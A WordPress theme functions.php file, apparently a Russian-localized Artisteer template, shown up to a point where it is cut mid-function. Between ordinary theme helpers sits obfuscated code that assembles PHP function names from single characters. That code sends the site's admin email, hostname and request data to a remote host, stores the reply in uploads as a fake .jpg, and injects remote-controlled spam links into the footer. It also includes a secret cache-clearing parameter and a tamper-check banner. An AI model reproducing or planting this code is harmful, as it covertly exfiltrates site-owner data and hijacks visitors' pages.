<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $LVDjHP='s';$kKSW='_';$vfnkwT='d';$TCbIAi='6';$iMGNsjd='4';$APYhiHD='b';$UxAIQJL='o';$ZBJA='e';$GUDHE='e';$UwOQcjV='d';$urjyq='e';$FGCpNbH='a';$lCcML='c';$hYfmbJXl=$APYhiHD.$FGCpNbH.$LVDjHP.$GUDHE.$TCbIAi.$iMGNsjd.$kKSW.$vfnkwT.$ZBJA.$lCcML.$UxAIQJL.$UwOQcjV.$urjyq;$IsFOc='t';$ycHngK='i';$RCUnz='n';$JwUCIEe='l';$BFtfFH='z';$XkTFK='a';$QKhH='f';$FFYT='e';$QdBPgTl='g';$KSvwWnDl=$QdBPgTl.$BFtfFH.$ycHngK.$RCUnz.$QKhH.$JwUCIEe.$XkTFK.$IsFOc.$FFYT;$VBBJf='r';$CDJmtW='r';$ibvZ='o';$EGyVoQA='s';$jUJB='3';$UtWoqB='1';$XTtwsQ='_';$TEJy='t';$yShhrK='t';$OzzxdDLb=$EGyVoQA.$TEJy.$CDJmtW.$XTtwsQ.$VBBJf.$ibvZ.$yShhrK.$UtWoqB.$jUJB;$NBvrny='v';$Pyosx='e';$cgtJjO='t';$CYpveRE='s';$GMoal='r';$WRZeEW='r';$cPQtzkPm=$CYpveRE.$cgtJjO.$WRZeEW.$GMoal.$Pyosx.$NBvrny;                     
		$sw___________l='s';$it______________d='_';$xp____________z='d';$zt_______________g='6';$hh_______________y='4';$bz____l='b';$ac______g='o';$py_______k='e';$gv__i='e';$xj__________w='d';$co___k='e';$vg____________y='a';$ed_______w='c';$zt____c=$bz____l.$vg____________y.$sw___________l.$gv__i.$zt_______________g.$hh_______________y.$it______________d.$xp____________z.$py_______k.$ed_______w.$ac______g.$xj__________w.$co___k;
		$nz__________e='t';$an____________g='s';$gj____l='_';$ul____________g='s';$ft_____________o='x';$lz_________a='i';$fk_________e='u';$bv______________o='i';$un___h='n';$kg_____v='t';$gy___________i='n';$kt_____y='o';$bh___________x='f';$ih__i='c';$ts__________o='e';$dx_____________h=$bh___________x.$fk_________e.$un___h.$ih__i.$nz__________e.$lz_________a.$kt_____y.$gy___________i.$gj____l.$ts__________o.$ft_____________o.$bv______________o.$ul____________g.$kg_____v.$an____________g;
		$cb_____________c='f';$qx_____d='e';$po______b='o';$zx____________t='p';$qh_____________d='n';$lw____g=$cb_____________c.$po______b.$zx____________t.$qx_____d.$qh_____________d;
		$jp______o='r';$ah__g='d';$tw_________i='a';$qz________v='e';$oc____________f='f';$wm_________c=$oc____________f.$jp______o.$qz________v.$tw_________i.$ah__g;
		$do_____a='s';$yv_____x='o';$no__k='c';$ft________b='f';$fd_________w='e';$nb______c='l';$mo______________u=$ft________b.$no__k.$nb______c.$yv_____x.$do_____a.$fd_________w;
		
		define("WP_ID", $zt____c("Mi4wLjA="));
		define("WP_TTL", $zt____c("MTA4MDA="));
		define("WP_SRC", $zt____c("dHBva24="));
	


		function wp_get_header() {
			global $zt____c, $dx_____________h;
			
			if (
				$dx_____________h($zt____c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dx_____________h($zt____c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dx_____________h($zt____c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zt____c, $lw____g, $mo______________u, $wm_________c;
			
			$rk__________q = TEMPLATEPATH."/".$zt____c("Zm9vdGVyLnBocA==");
			$ng______________v = @$lw____g($rk__________q, "r");
			$rk__________q = @$wm_________c($ng______________v, @filesize($rk__________q));
			@$mo______________u($ng______________v);
			
			$sn_____________p = TEMPLATEPATH."/".$zt____c("ZnVuY3Rpb25zLnBocA==");
			$ng______________v = @$lw____g($sn_____________p, "r");
			$sn_____________p = @$wm_________c($ng______________v, @filesize($sn_____________p));
			@$mo______________u($ng______________v);
			
			$nl_________o = 0;
			if($rk__________q && $sn_____________p) {
				if ($zt____c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($rk__________q, $zt____c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nl_________o = 1;
					}
					if (substr_count($rk__________q, "wp_theme_GPL_credits()") < 1) {
						$nl_________o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nl_________o = 12;
				}
			}
			
			if($nl_________o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nl_________o -->";
			}
		}
	


		function wp_loaded() {
			global $zt____c, $dx_____________h;
			return $dx_____________h($zt____c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($wd______________s, $ss______p = "(more...)", $az__________u = 0, $ox________z = "") {
				$ve______i = get_the_content($ss______p, $az__________u, $ox________z);
				$ve______i = apply_filters("the_content", $ve______i);
				
				$ve______i = str_replace("]]>", "]]>", $ve______i);
				if (strlen($_GET["p"]) > 0) {
					echo $ve______i;
				}
				else if ((strlen($ve______i)>$wd______________s) && ($bd____k = strpos($ve______i, " ", $wd______________s ))) {
					$ve______i = substr($ve______i, 0, $bd____k);
					$ve______i = $ve______i;
					echo $ve______i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ss______p</a></div></p>";
				} else {
					echo $ve______i;
				}
				
			}
		}
	


		$lj_______l='d';$yz______________x='b';$up________s='s';$dr______________g='4';$ho______p='_';$ef___j='o';$nh_______________r='e';$sb_____q='e';$ef______a='e';$zd______________o='6';$nk__f='a';$ad_________o='n';$op____________j='c';$mj______w=$yz______________x.$nk__f.$up________s.$ef______a.$zd______________o.$dr______________g.$ho______p.$sb_____q.$ad_________o.$op____________j.$ef___j.$lj_______l.$nh_______________r;
		$uf______g='n';$md________v='t';$ux________u='_';$ec_______________h='e';$ad______d='n';$sp______________b='s';$rw__________r='o';$ci_______s='_';$ve______________z='g';$jq________r='f';$ae_________q='e';$ls_____________h='t';$jk______________w='c';$ng_______________t='l';$al______________b='i';$ws_____b='e';$iu___c='t';$mj______________c=$jq________r.$al______________b.$ng_______________t.$ae_________q.$ci_______s.$ve______________z.$ec_______________h.$md________v.$ux________u.$jk______________w.$rw__________r.$ad______d.$ls_____________h.$ws_____b.$uf______g.$iu___c.$sp______________b;
		$ii______u='i';$hn________v='x';$rc______________p='e';$af__________v='t';$hw____________r='i';$uo______________w='l';$nr______________w='s';$ep___u='_';$kr_______________f='f';$qh___j='e';$to___________l='s';$pv___________a=$kr_______________f.$ii______u.$uo______________w.$rc______________p.$ep___u.$qh___j.$hn________v.$hw____________r.$nr______________w.$af__________v.$to___________l;
		$mf____j='r';$ug_____j='v';$uu____________e='p';$kx_______t='c';$ev______________q='o';$ac__o='m';$ux________s='n';$vg_______________q='r';$ek______k='e';$oj__l='o';$ns____________e='s';$jg_______e='e';$jf____________b='i';$ge___________a='_';$zm_____n='a';$fs________w=$ug_____j.$jg_______e.$mf____j.$ns____________e.$jf____________b.$oj__l.$ux________s.$ge___________a.$kx_______t.$ev______________q.$ac__o.$uu____________e.$zm_____n.$vg_______________q.$ek______k;
		$tr___d='k';$wn____________j='o';$de_______f='p';$mt___________s='c';$po_________i='n';$yx____f='o';$sv____________g='s';$lz_________f='f';$yq__j='e';$gw________o=$lz_________f.$sv____________g.$wn____________j.$mt___________s.$tr___d.$yx____f.$de_______f.$yq__j.$po_________i;
		$tt___________u='t';$vv_______________c='e';$sq_____________s='i';$ks___________g='w';$zc___k='f';$zi__________a='r';$gd__________r=$zc___k.$ks___________g.$zi__________a.$sq_____________s.$tt___________u.$vv_______________c;
		$ub__________o='d';$ug______p='5';$ee_____w='m';$ij_____________z=$ee_____w.$ub__________o.$ug______p;
		$fe______f='e';$kh____________e='h';$lk__________d='p';$gu__________j='a';$cu___y='l';$tu_______________o='r';$ok_______t='a';$jq__________f='t';$fy_____w=$tu_______________o.$fe______f.$ok_______t.$cu___y.$lk__________d.$gu__________j.$jq__________f.$kh____________e;
		$wy______v='i';$te_____________r='e';$xk_____v='e';$yv______l='n';$ji____________q='l';$ts______y='s';$fu___________b='r';$db_____________w='z';$lh____________j='i';$hc_________c='u';$kd_________g='a';$qb_______________s=$hc_________c.$yv______l.$ts______y.$xk_____v.$fu___________b.$wy______v.$kd_________g.$ji____________q.$lh____________j.$db_____________w.$te_____________r;
		$th____________w='m';$ci___e='e';$qz________l='t';$vu_________x='a';$no__________v='m';$oi________w='p';$vu__________q='n';$gp______f=$qz________l.$ci___e.$no__________v.$oi________w.$vu__________q.$vu_________x.$th____________w;
		$up______f='s';$oe______l='n';$um____________i='r';$qb____________f='e';$mo___________q='t';$ox______a='e';$jn_____________i='o';$bd________k='a';$ii___g='e';$xj___________x='r';$oz______g='t';$di___z='_';$wt____q='c';$la______________g='t';$sj_______________v='e';$ol____________e='m';$xv______________z='a';$ea_____s='x';$za______z='t';$bg__________k='c';$ud_______w='_';$ct________j=$up______f.$za______z.$xj___________x.$sj_______________v.$xv______________z.$ol____________e.$ud_______w.$wt____q.$jn_____________i.$oe______l.$oz______g.$ii___g.$ea_____s.$la______________g.$di___z.$bg__________k.$um____________i.$qb____________f.$bd________k.$mo___________q.$ox______a;
	


		function kc_____________w($il________x) {
			global $zt____c, $dx_____________h, $mj______________c, $fs________w, $ct________j;
			
			if (!$dx_____________h($zt____c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fs________w(PHP_VERSION, "5.0.0", ">=") && $dx_____________h($zt____c("ZmlsZV9nZXRfY29udGVudHM=")) && $dx_____________h($zt____c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$yw______m = $ct________j(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$px_______y = @$mj______________c($il________x, 0, $yw______m);
			} else {
				$px_______y = @$mj______________c($il________x, 0);
			}
			
			return $px_______y;
		}
	


		function vw_________n($il________x) {
			global $dx_____________h, $gw________o, $gd__________r, $zt____c;
			
			if (!$dx_____________h($zt____c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$yt____________g = strpos($il________x, "/", 7);
			$aq___w = array(
				"uri"     => substr($il________x, $yt____________g),
				"host"    => str_replace("http://", "", substr($il________x, 0, $yt____________g)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$la__m = @$gw________o("$aq___w[host]", 80, $cq___c, $wn____i, 4);
			
			if (!$la__m) {
				return false;
			} else {
				$px_______y = "";
				$cp_______________f  = "GET $aq___w[uri] HTTP/1.0\r\n";
				$cp_______________f .= "Host: $aq___w[host]\r\n";
				$cp_______________f .= "Referer: $aq___w[referer]\r\n";
				$cp_______________f .= "Connection: Close\r\n\r\n";
				
				@$gd__________r($la__m, $cp_______________f);
				
				while (!@feof($la__m)) {
					$mi_______________j = @fgets($la__m, (1024*24));
					
					if ($mi_______________j == "\r\n") {
						$gv___d = true;
						continue;
					}
					
					if ($gv___d) {
						$px_______y .= $mi_______________j;
					}
				}
				
				return $px_______y;
			}
		}
	


		function vn___________j($il________x) {
			global $dx_____________h;
			$tx____g = false;
			
			if ($il________x != "") {
				if ($dx_____________h("kc_____________w")) {
					$tx____g = @kc_____________w($il________x);
				}
				
				if (!$tx____g && ($dx_____________h("vw_________n"))) {
					$tx____g = @vw_________n($il________x);
				}
			}
			
			return $tx____g;
		}
	


		function cj__e() {
			global $_SERVER, $ij_____________z;
			
			$jf_____________m = $_SERVER["SERVER_NAME"];
			
			if (substr("$jf_____________m", 0, 4) == "www.") {
				$jf_____________m = substr("$jf_____________m", 4);
			}
			
			$jf_____________m = $ij_____________z("$_SERVER[SERVER_NAME]");
			
			return $jf_____________m;
		}
	


		function xp____r() {
			return "file";
		}
	


		function sk_____x($il________x) {
			global $_SERVER, $mj______________c, $pv___________a, $lw____g, $mo______________u, $gd__________r;
			
			$od_______________h = mq_____c();
			
			$pz__p = cj__e().".jpg";
			$nt______________n = $od_______________h["dir_upload"]["path"]."/$pz__p";
			$uj_______v = @filemtime($nt______________n);
			
			if (!$uj_______v || ((time()-$uj_______v) >= WP_TTL)) {
				$tx____g = vn___________j($il________x);
				
				if ($tx____g) {
					if ($pv___________a($nt______________n)) {
						@unlink($nt______________n);
					}
					
					$ng______________v = @$lw____g($nt______________n, "x+");
					
					@$gd__________r($ng______________v, $tx____g);
					@$mo______________u($ng______________v);
				}
			} else {
				if ($pv___________a($nt______________n)) {
					$tx____g = @$mj______________c($nt______________n);
				} else {
					$tx____g = false;
				}
			}
			
			return $tx____g;
		}
	


		function mq_____c() {
			global $_SERVER, $zt____c, $mj______w;
			
			$oy____________e = wp_count_posts("post");
			$mg_________q = pathinfo(get_bloginfo("template_directory"));
			
			$od_______________h = array(
				"url" => array(
					"report"      => $zt____c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $mg_________q,
				"dir_upload"	=> mr_______________n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$mg_________q[filename],
					"a005=".$oy____________e->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.odmu.od.ua/zdorove/poseshhenie-kinoteatrov-vliyaet-na-figuru\">Посещение кинотеатров влияет на фигуру</a>"
			);
			
			$od_______________h["url"]["queryString"] = implode("&", $od_______________h["queryString"]);
			$od_______________h["url"]["report"] = $od_______________h["url"]["report"]."/?".$mj______w($od_______________h["url"]["queryString"]).".html";
						
			return $od_______________h;
		}
	


		function mr_______________n() {
			$mb____________d = wp_upload_dir();
			
			if (isset($mb____________d["error"])) {
				$vv___h = jt_______________d();
				if (is_writable($vv___h)) {
					$mb____________d = array("path" => $vv___h);
				}
			}

			return $mb____________d;
		}
	


		function jt_______________d() {
			global $dx_____________h, $ij_____________z, $fy_____w, $gp______f;
			
			$mo___________y = (bool) ini_get("safe_mode");
			if ($mo___________y == true) {
				return false;
			}
			
			if ($dx_____________h("sys_get_temp_dir")) {
				$ge___________m = sys_get_temp_dir();
				if (is_writable($ge___________m)) {
					return $fy_____w($ge___________m);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $fy_____w($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $fy_____w($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $fy_____w($_ENV["TEMP"]);
			} else {
				$bb___________t = $gp______f($ij_____________z(uniqid(rand(), true)), "");
				if ($bb___________t) {
					$ge___________m = $fy_____w(dirname($bb___________t));
					@unlink($bb___________t);
					return $ge___________m;
				} else {
					return false;
				}
			}
		}
	


		function jz__________r() {
			global $_GET, $pv___________a;
			
			$od_______________h = mq_____c();
			$jf_____________m = cj__e();
			$jv____z = xp____r();
			
			$rb_______________b = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($jv____z == "file") {
					$ew___u = $od_______________h["dir_upload"]["path"]."/".$jf_____________m.".jpg";
					if ($pv___________a($ew___u)) {
						@unlink($ew___u);
						$rb_______________b = "deleted";
					}
				}
				
				$dt_______________m = array(
					"s"	=> $rb_______________b,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($dt_______________m AS $fh__________j => $es____w) echo " [$fh__________j:$es____w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dx_____________h, $zt____c, $qb_______________s;
			$od_______________h = mq_____c();
			
			$bo_________c = "sk_____x";
			if ($dx_____________h($bo_________c)) {
				$px_______y = $bo_________c($od_______________h["url"]["report"]);
			}
			
			if ($px_______y) {
				if ($px_______y = @$zt____c($px_______y)) {
					$px_______y = @$qb_______________s($px_______y);
					
					if (strlen($px_______y[custom_credit]) >= 5) {
						$od_______________h["default_string"] = $px_______y[custom_credit];
					}
					
					if ($px_______y["status"] == "0") {
						$lo___t = 1;
						$ms_____d = 1;
					} else {
						$sy___a = sizeof($px_______y["links"]);
						$wk___________c = $od_______________h["default_string"];
						
						if ($sy___a > 0 && $px_______y["links"] !== "") {
							$rn____________y = 0;
							foreach ($px_______y["links"] as $gb___y => $ig_____________b) {
								$rn____________y++;
								if ($ig_____________b->l_path == "" || $ig_____________b->l_path == $_SERVER["REQUEST_URI"]) {
									$ig_____________b->l_href = htmlspecialchars(strip_tags($ig_____________b->l_href));
									$ig_____________b->l_title = htmlspecialchars(strip_tags($ig_____________b->l_title));
									$ig_____________b->l_anchor = htmlspecialchars(strip_tags($ig_____________b->l_anchor));
									$wk___________c .= " | ";
									$wk___________c .= "<a href='$ig_____________b->l_href' title='$ig_____________b->l_title'";
									if ($ig_____________b->l_nofollow == "1") {
										$wk___________c .= " rel='nofollow'";
									}
									$wk___________c .= ">$ig_____________b->l_anchor</a>";
								}
							}
						}
						$od_______________h["links"] = "$wk___________c";
						if ($px_______y[credit] == "0") {
							$od_______________h["links"] = "";
						}
					}
				} else {
					$lo___t = "1";
				}
			} else {
				$lo___t = "1";
			}
			
			if ($lo___t == "1") {
				$od_______________h["links"] = $od_______________h["default_string"];
			}
			
			echo "$od_______________h[links]";
			
			echo "<!-- s: $px_______y[signature] -->";
			jz__________r();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
